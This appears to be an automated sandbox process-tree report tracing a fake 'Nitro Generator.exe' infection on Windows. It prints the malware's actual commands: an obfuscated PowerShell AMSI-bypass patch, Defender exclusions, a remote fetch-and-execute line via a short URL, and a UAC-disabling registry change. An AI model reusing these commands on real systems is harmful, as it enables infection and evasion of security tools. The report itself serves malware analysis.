1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1144
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:veUGIMwcrHvM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CwUgMgpOBeQMKR,[Parameter(Position=1)][Type]$FvewIAgFfL)$jFEfnFrbxAX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yDe'+[Char](108)+''+[Char](101)+'g'+[Char](97)+'te'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+','+''+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+'ss',[MulticastDelegate]);$jFEfnFrbxAX.DefineConstructor('R'+[Char](84)+''+'S'+''+'p'+'eci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CwUgMgpOBeQMKR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$jFEfnFrbxAX.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','Publ'+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+'S'+'i'+'g'+','+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+'r'+'t'+'ual',$FvewIAgFfL,$CwUgMgpOBeQMKR).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $jFEfnFrbxAX.CreateType();}$JqbdIqGfVUjFv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+[Char](110)+'3'+'2'+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'od'+'s'+'');$OkxgCPCJiEFrRJ=$JqbdIqGfVUjFv.GetMethod(''+'G'+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+'l'+'ic,St'+[Char](97)+''+[Char](116)+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JDdkEsmihuYRGOUKRZK=veUGIMwcrHvM @([String])([IntPtr]);$xqZOqNnEAdVLlanIfvmMPZ=veUGIMwcrHvM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$qbfJdZgBFOY=$JqbdIqGfVUjFv.GetMethod(''+'G'+''+'e'+'t'+[Char](77)+'o'+[Char](100)+'u'+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'dl'+[Char](108)+'')));$evETqPPXdFrgOJ=$OkxgCPCJiEFrRJ.Invoke($Null,@([Object]$qbfJdZgBFOY,[Object](''+[Char](76)+''+[Char](111)+'adLib'+[Char](114)+''+[Char](97)+''+[Char](114)+'yA')));$ZgStBYMgWIHdABdCj=$OkxgCPCJiEFrRJ.Invoke($Null,@([Object]$qbfJdZgBFOY,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'P'+'r'+''+[Char](111)+'t'+[Char](101)+'c'+'t'+'')));$fhnFGNR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($evETqPPXdFrgOJ,$JDdkEsmihuYRGOUKRZK).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$YJrSnqxVIcLpIrDTe=$OkxgCPCJiEFrRJ.Invoke($Null,@([Object]$fhnFGNR,[Object]('A'+'m'+''+'s'+''+'i'+''+'S'+'ca'+[Char](110)+''+'B'+''+'u'+'ff'+[Char](101)+''+[Char](114)+'')));$OkdnkeuNCq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZgStBYMgWIHdABdCj,$xqZOqNnEAdVLlanIfvmMPZ).Invoke($YJrSnqxVIcLpIrDTe,[uint32]8,4,[ref]$OkdnkeuNCq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YJrSnqxVIcLpIrDTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZgStBYMgWIHdABdCj,$xqZOqNnEAdVLlanIfvmMPZ).Invoke($YJrSnqxVIcLpIrDTe,[uint32]8,0x20,[ref]$OkdnkeuNCq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](115)+'v'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1460
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1428
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault4872d529h1b44h4c6aha2bch286dd6a232ef
    3⤵
    PID:5228
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffef2b046f8,0x7ffef2b04708,0x7ffef2b04718
      4⤵
      PID:5300
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,10767734870791815824,17912984514303666002,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
      4⤵
      PID:5516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,10767734870791815824,17912984514303666002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,10767734870791815824,17912984514303666002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
      4⤵
      PID:5564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulte08bab58h64d6h4253hab79hd471898fbbf0
    3⤵
    PID:1196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffef2b046f8,0x7ffef2b04708,0x7ffef2b04718
      4⤵
      PID:832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,2798523448710636027,4708944608061064825,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
      4⤵
      PID:4936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,2798523448710636027,4708944608061064825,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3056
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,2798523448710636027,4708944608061064825,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
      4⤵
      PID:6128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1876
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x49c 0x150
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1256
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x49c 0x150
  2⤵
  PID:4364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2224

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2828

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2892

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3340

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/7cdxFK4L#Io2Hue4hwSOKhugcwhvAvNvz7ViKQqmBYX7YynYEe58
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2496
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff07c0cc40,0x7fff07c0cc4c,0x7fff07c0cc58
    3⤵
    PID:4244
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1852 /prefetch:2
    3⤵
    PID:3960
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2156 /prefetch:3
    3⤵
    PID:1776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2252 /prefetch:8
    3⤵
    PID:4592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3132 /prefetch:1
    3⤵
    PID:3012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3220 /prefetch:1
    3⤵
    PID:5024
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4356,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4648 /prefetch:8
    3⤵
    PID:4500
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4856,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4840 /prefetch:8
    3⤵
    PID:1268
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5144,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5156 /prefetch:8
    3⤵
    PID:5112
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4824,i,18352110906836428688,5372558026167858884,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5136 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3968
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap25154:92:7zEvent29367
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2492
- C:\Users\Admin\Downloads\Nitro Generator.exe
  "C:\Users\Admin\Downloads\Nitro Generator.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  PID:5636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Nitro Generator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nitro Generator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nitro Generator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:5660
- - C:\Windows\SYSTEM32\CMD.EXE
    "CMD.EXE"
    3⤵
    PID:5092
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell "irm shorturl.at/K1U78 | iex"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      PID:736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -execUTIOnPoliCY BypaSs aDd-MPPREfeRenCe -ExCLUSIOnpaTh $Env:pROGRAMdata, $env:TEMp, $env:hOMEDrive; SeT-itEMPRoperty -patH "HKlM:\SoftwarE\miCrOsOFt\WINdoWS\CUrRENtverSION\pOlICieS\SySTeM" -NAmE "conSEntPrompTbeHavIoRADMIN" -ValUe 0 -tYPe DwoRD
        5⤵
        UAC bypass
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5804
    - - C:\ProgramData\ukLAj.EXE
        
        "C:\ProgramData\ukLAj.EXE"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3484
      - C:\Users\Admin\AppData\Local\Temp\rQHBDWIQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\rQHBDWIQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:392
    - - C:\ProgramData\sVUZSib0.exe
        
        "C:\ProgramData\sVUZSib0.exe"
        5⤵
        Executes dropped EXE
        
        PID:1940
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1940 -s 1648
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1156
    - - C:\ProgramData\wkKy3.exE
        
        "C:\ProgramData\wkKy3.exE"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3968
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1500
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2392
- C:\Users\Admin\Downloads\Nitro Generator.exe
  "C:\Users\Admin\Downloads\Nitro Generator.exe"
  2⤵
  - Executes dropped EXE
  PID:3016
- C:\Users\Admin\Downloads\Nitro Generator.exe
  "C:\Users\Admin\Downloads\Nitro Generator.exe"
  2⤵
  - Executes dropped EXE
  PID:1308
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2970:92:7zEvent13915
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:5020
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\.rsrc\version.txt
  2⤵
  PID:5824
- C:\Users\Admin\Downloads\Nitro Generator.exe
  "C:\Users\Admin\Downloads\Nitro Generator.exe"
  2⤵
  - Executes dropped EXE
  PID:1648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3768

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2908

